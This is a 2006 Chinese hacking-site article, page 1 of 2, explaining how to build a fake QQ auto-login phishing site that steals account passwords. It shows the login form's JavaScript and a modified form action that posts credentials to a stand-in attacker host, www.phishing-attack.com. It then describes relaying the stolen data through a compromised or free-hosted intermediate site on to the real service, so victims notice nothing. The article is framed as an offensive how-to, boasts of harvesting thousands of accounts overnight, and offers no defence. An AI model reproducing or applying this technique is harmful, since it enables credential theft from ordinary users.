|
|
域名空间 下载中心 社区论坛 信息公告 my小屋 | |
 |
联系我们 设为首页 加入收藏 |
 |
|
 |
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿 论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图 专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版 社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务 |
 |
 |
 |
 当前位置:首页>>网络安全>>黑客技术>>正文 |
新版上线![旧版] |  |
|||
注:打开慢时请稍等
伪造qq挂机平台盗密码http://www.iyit.net 日期:2006-5-29 14:56:21 来源:www.hackbase.com 点击: |
为了保护作者以及杂志社本身请大家看完”免责声明”后方可阅读. 免责声明: 作者无法鉴别判断读者阅读本文后的用途,如果读者在阅读本文后违反国家法律规定而出现的纠纷与及不良结果,由行为人独立承担所有责任,本文的作者以及刊登该文章的杂志社均不负责也不承担任何法律责任。 现在盗取任何聊天软件的号码,不外乎就是利用盗号软件以及键盘记录软件记录被种植主机的账号以及密码,这种累赘而又需要多方软件支持的手法已经过时了,而现在行之有效的就是利用无污染(不需要软件以及任何病毒)去进行的盗取账号密码的网络钓鱼攻击,网络钓鱼已经变成了黑客以及一些不法分子用来进行银行账号以及等等相关敏感信息盗取的最有效最快速的途径,而我们也可以利用网络钓鱼在一夜之间拥有成千上万的qq 号以及密码(甚至于qq 密保信息).首先钓鱼者本身是会仿冒一个挂qq 的网站页面,因为要致使访问者可以相信,所以在仿冒会根据时下最多人访问的挂qq 网站进行设计(如图1.) 仿冒好一个虚假的网站之后,钓鱼者本身会想办法如何去保存所钓到的资料,通常在钓鱼网站中都会采取本地记录相关资料,但是整个用户的使用流程就会在输入账号以及密码后出现问题,就是说钓鱼者自身会想个借口出来说:”该系统因系统繁忙,暂时无法为你服务!”等等的理由,让被钓者信服,但是现在作为被钓者本身已经不再这么的愚蠢,所以传统的钓鱼模式已经无法行得通.为了可以使被钓者整个使用流程不会出现任何的怀疑,所以钓鱼者会在提交处做一定的手脚.让我们看看例子: } function login() {window.open("about:blank","qqlogin", "width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n o"); document.qqform.target = "qqlogin"; document.qqform.action = "login.asp"; document.qqform.submit(); } 因为篇幅关系删除多余语句 从上面的代码我们可以看到,这是一个正常挂q网站的登录页面代码,当用户访问网站的时候,输入的账号以及密码就会提交给login.asp 页面,然后再转去挂q系统.如果作为钓鱼者本身想完美的结合真实的挂q 网站去完成整个操作流程,那样子他就必须在这个提交页面做一些修改,使到被钓者的信息先存储在自定的地方,然后再转发到真实的挂q 网站,所以钓鱼者会有可能的把代码提交的语句修改为: document.qqform.action = "http://www.phishing-attack.com/pass.asp"; 在这里我们可以看到钓鱼者把提交的数据转发过去了www.phishing-attack.com的网站,为了避免数据会被发现,所以钓鱼者利用中间站记录用户所提交的信息.可能大家会问到那整个钓鱼过程是怎么样的了?我给一个比较简单的过程大家看看 钓鱼网站--------------中间记录站----------------真实挂q网站 当用户访问的时候,会将密码提交给钓鱼网站,钓鱼网站会把数据转去中间记录站,然后在中间记录站进行数据的保存,再次将用户所提交的数据提交给真实的挂q网站,这样子在过程中用户不单止可以完成整个操作的流程,并且钓鱼者本身可以记录密码信息延长整个钓鱼网站的生命周期(作者注:通常钓鱼网站自身的生命周期为15 天).整个思路就是如此了,然而中间站的作用是为了保存信息以及保护信息的安全性,不必担心当虚假网站被发现时,所保存的数据会被发现,通常这些作为中间站的网站都是钓鱼者的傀儡,有可能是被入侵后的,或者利用免费空间或者是只有7 天试用的测试空间作为临时的中转. 本新闻共2页,当前在第1页 1 2 本新闻共2页,当前在第1页 1 2 编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部] 上一篇:在木马中简单实现远程关机 下一篇:网络防火墙与防范溢出策略 转载请注明来源:www.iyit.net 特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
| 最新更新 | 热点排行 | 推荐新闻 | |||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||
| 友情链接 | ||||||
 |
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接 |  |
| |||||||
易特网络技术